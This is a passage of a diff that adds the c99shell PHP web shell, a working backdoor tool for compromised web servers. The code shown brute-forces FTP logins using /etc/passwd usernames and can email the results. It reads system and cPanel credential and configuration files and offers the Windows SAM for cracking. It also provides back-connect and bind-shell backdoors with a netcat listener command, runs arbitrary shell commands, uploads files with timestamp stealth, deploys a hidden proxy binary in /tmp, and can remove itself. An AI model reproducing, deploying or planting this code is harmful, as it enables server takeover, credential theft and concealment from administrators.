with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. 
connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = 
posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "</br><b><font color=green>You can crack winnt passwords. 
<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." 
- </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = 
text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>"; + echo "</br>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" 
onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>"; + } + echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></form>"; +} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. 
Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>"); + echo("$msg"); + echo("$emsg"); +} + +if ($act == "shbd"){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST> +Bind Port: <input type='text' name='backconnectport' value='5992'> +<input type='hidden' name='use' value='shbd'> +<input type='submit' value='Install Backdoor'></form>"); +echo("$msg"); +echo("$emsg"); +} + + +if ($act == "proxy") { + cf("/tmp/hantu.tgz",$proxy_shit); + ex("cd /tmp;tar -zxvf hantu.tgz"); + ex("cd /tmp;cd .setan;chmod 777 xh"); + ex("cd /tmp;cd .setan;chmod 777 httpd"); + ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start"); + checkproxyhost(); + $msg = $_POST['proxyhostmsg']; + echo("$msg"); + unlink("/tmp/hantu.tgz"); + ex("cd /tmp; rm -r .setan"); +} + +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." 
</br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "search"){ + echo "<b>Search file-system:</b></br></br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text)."> + +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" 
checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" 
checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". 
Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + 
$delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." 
to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + $execcmd = $_REQUEST['cmd']; + echo "Result Of Locally Executed Command: <b>$execcmd</b></br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == 
"..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects 
as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { 